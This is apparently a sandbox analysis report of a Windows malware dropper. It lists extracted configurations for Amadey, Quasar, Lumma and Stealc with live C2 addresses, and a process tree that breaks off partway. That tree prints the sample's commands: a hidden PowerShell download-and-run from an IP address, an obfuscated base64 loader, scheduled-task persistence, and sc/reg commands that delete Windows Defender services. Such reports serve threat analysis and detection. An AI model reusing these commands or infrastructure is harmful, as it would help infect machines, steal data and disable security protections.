Analysis

  • max time kernel
    149s
  • max time network
    157s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/03/2025, 13:34

General

  • Target

    2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    0e4ac18b2224b5d46bfb6a68417a0104

  • SHA1

    38922c092ce214d8f87586f7ed13d68814a95057

  • SHA256

    31bd1ef59c8715bdd8a5bf2e8231e43f9156d1b71901061b552dbbd37550960a

  • SHA512

    6ffa7135c8a61329be36dbfca51c8f74b75e8ab8596d8407c1ea628f27b8b9a3e862ffdcfb1de40379b91ca33109bc0f2b9b57cffe3735649f9c8b86796e8629

  • SSDEEP

    24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8a0ou:/TvC/MTQYxsWR7a0o

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

quasar

Version

1.5.0

Botnet

Office04

C2

goku92ad.zapto.org:5000

Mutex

a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a

Attributes
  • encryption_key

    BF72099FDBC6B48816529089CF1CF2CF86357D14

  • install_name

    Client.exe

  • log_directory

    Logs

  • reconnect_delay

    3000

  • startup_key

    Quasar Modded Client Startup

  • subdirectory

    SubDir

Extracted

Family

lumma

C2

https://navstarx.shop/FoaJSi

https://metalsyo.digital/opsa

https://ironloxp.live/aksdd

https://starcloc.bet/GOksAo

https://advennture.top/GKsiio

https://targett.top/dsANGt

https://spacedbv.world/EKdlsk

https://galxnetb.today/GsuIAo

https://skynetxc.live/AksoPA

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://apixtreev.run/LkaUz

https://tsparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

https://rodformi.run/aUosoz

https://cosmosyf.top/GOsznj

https://esccapewz.run/ANSbwqy

https://touvrlane.bet/ASKwjq

https://sighbtseeing.shop/ASJnzh

https://holidamyup.today/AOzkns

Extracted

Family

stealc

Botnet

trump

C2

http://45.93.20.28

Attributes
  • url_path

    /85a1cacf11314eb8.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detect Xworm Payload 2 IoCs
  • Detects Healer an antivirus disabler dropper 3 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Modifies security service 2 TTPs 2 IoCs
  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar family
  • Quasar payload 2 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • Xworm

    Xworm is a remote access trojan written in C#.

  • Xworm family
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 16 IoCs
  • Blocklisted process makes network request 6 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 16 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 22 IoCs
  • Possible privilege escalation attempt 4 IoCs
  • Sets service image path in registry 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • .NET Reactor proctector 2 IoCs

    Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.

  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 17 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Deletes itself 1 IoCs
  • Drops startup file 4 IoCs
  • Event Triggered Execution: Component Object Model Hijacking 1 TTPs

    Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.

  • Executes dropped EXE 59 IoCs
  • Identifies Wine through registry keys 2 TTPs 16 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 35 IoCs
  • Modifies file permissions 1 TTPs 4 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 9 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs

    Suspicious Windows Authentication Registry Modification.

  • Drops file in System32 directory 5 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 16 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 31 IoCs
  • Launches sc.exe 64 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 5 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 20 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 40 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 4 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 37 IoCs
  • Suspicious use of SendNotifyMessage 26 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-30_0e4ac18b2224b5d46bfb6a68417a0104_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:5704
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn juZPRmavlNI /tr "mshta C:\Users\Admin\AppData\Local\Temp\q59b2J6kT.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2432
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn juZPRmavlNI /tr "mshta C:\Users\Admin\AppData\Local\Temp\q59b2J6kT.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:6036
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\q59b2J6kT.hta
      2⤵
      • Checks computer location settings
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:1008
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'HJFJVXTMPA0ZKYEPCI1OWWUH6CA4YQAC.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4728
        • C:\Users\Admin\AppData\Local\TempHJFJVXTMPA0ZKYEPCI1OWWUH6CA4YQAC.EXE
          "C:\Users\Admin\AppData\Local\TempHJFJVXTMPA0ZKYEPCI1OWWUH6CA4YQAC.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:6120
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • System Location Discovery: System Language Discovery
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:620
            • C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:1724
            • C:\Users\Admin\AppData\Local\Temp\10362200101\81dd764815.exe
              "C:\Users\Admin\AppData\Local\Temp\10362200101\81dd764815.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:800
            • C:\Windows\SysWOW64\cmd.exe
              "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
              6⤵
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:1708
              • C:\Windows\SysWOW64\cmd.exe
                C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"
                7⤵
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4640
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
                  8⤵
                  • Blocklisted process makes network request
                  • Command and Scripting Interpreter: PowerShell
                  • Drops startup file
                  • System Location Discovery: System Language Discovery
                  • Suspicious behavior: AddClipboardFormatListener
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:2416
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
                    9⤵
                    • Command and Scripting Interpreter: PowerShell
                    • System Location Discovery: System Language Discovery
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:2780
            • C:\Users\Admin\AppData\Local\Temp\10374380101\b4bdddd769.exe
              "C:\Users\Admin\AppData\Local\Temp\10374380101\b4bdddd769.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:4984
              • C:\Users\Admin\AppData\Local\Temp\221.exe
                "C:\Users\Admin\AppData\Local\Temp\221.exe"
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4708
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D1F6.tmp\D1F7.tmp\D1F8.bat C:\Users\Admin\AppData\Local\Temp\221.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:5344
                  • C:\Users\Admin\AppData\Local\Temp\221.exe
                    "C:\Users\Admin\AppData\Local\Temp\221.exe" go
                    9⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    • Suspicious use of WriteProcessMemory
                    PID:1436
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D2F0.tmp\D2F1.tmp\D2F2.bat C:\Users\Admin\AppData\Local\Temp\221.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2084
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                          PID:704
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                          • Launches sc.exe
                          PID:3152
                        • C:\Windows\system32\timeout.exe
                          timeout /t 1
                          11⤵
                          • Delays execution with timeout.exe
                          PID:1184
                        • C:\Windows\system32\sc.exe
                          sc stop ddrver
                          11⤵
                          • Launches sc.exe
                          PID:6012
                        • C:\Windows\system32\sc.exe
                          sc start ddrver
                          11⤵
                            PID:3852
                          • C:\Windows\system32\takeown.exe
                            takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:4168
                          • C:\Windows\system32\icacls.exe
                            icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                            11⤵
                            • Possible privilege escalation attempt
                            • Modifies file permissions
                            PID:5296
                          • C:\Windows\system32\sc.exe
                            sc stop "WinDefend"
                            11⤵
                            • Launches sc.exe
                            PID:3868
                          • C:\Windows\system32\sc.exe
                            sc delete "WinDefend"
                            11⤵
                              PID:3940
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                              11⤵
                                PID:5528
                              • C:\Windows\system32\sc.exe
                                sc stop "MDCoreSvc"
                                11⤵
                                  PID:5588
                                • C:\Windows\system32\sc.exe
                                  sc delete "MDCoreSvc"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2324
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                                  11⤵
                                    PID:1744
                                  • C:\Windows\system32\sc.exe
                                    sc stop "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:3024
                                  • C:\Windows\system32\sc.exe
                                    sc delete "WdNisSvc"
                                    11⤵
                                    • Launches sc.exe
                                    PID:5492
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                                    11⤵
                                      PID:4056
                                    • C:\Windows\system32\sc.exe
                                      sc stop "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:6052
                                    • C:\Windows\system32\sc.exe
                                      sc delete "Sense"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2924
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                                      11⤵
                                        PID:5216
                                      • C:\Windows\system32\sc.exe
                                        sc stop "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:3752
                                      • C:\Windows\system32\sc.exe
                                        sc delete "wscsvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:4580
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                        11⤵
                                        • Modifies security service
                                        PID:5116
                                      • C:\Windows\system32\sc.exe
                                        sc stop "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2960
                                      • C:\Windows\system32\sc.exe
                                        sc delete "SgrmBroker"
                                        11⤵
                                        • Launches sc.exe
                                        PID:1496
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                        11⤵
                                          PID:5912
                                        • C:\Windows\system32\sc.exe
                                          sc stop "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2716
                                        • C:\Windows\system32\sc.exe
                                          sc delete "SecurityHealthService"
                                          11⤵
                                          • Launches sc.exe
                                          PID:5604
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                          11⤵
                                            PID:4324
                                          • C:\Windows\system32\sc.exe
                                            sc stop "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:4180
                                          • C:\Windows\system32\sc.exe
                                            sc delete "webthreatdefsvc"
                                            11⤵
                                            • Launches sc.exe
                                            PID:4420
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                            11⤵
                                              PID:4468
                                            • C:\Windows\system32\sc.exe
                                              sc stop "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
                                              PID:4304
                                            • C:\Windows\system32\sc.exe
                                              sc delete "webthreatdefusersvc"
                                              11⤵
                                              • Launches sc.exe
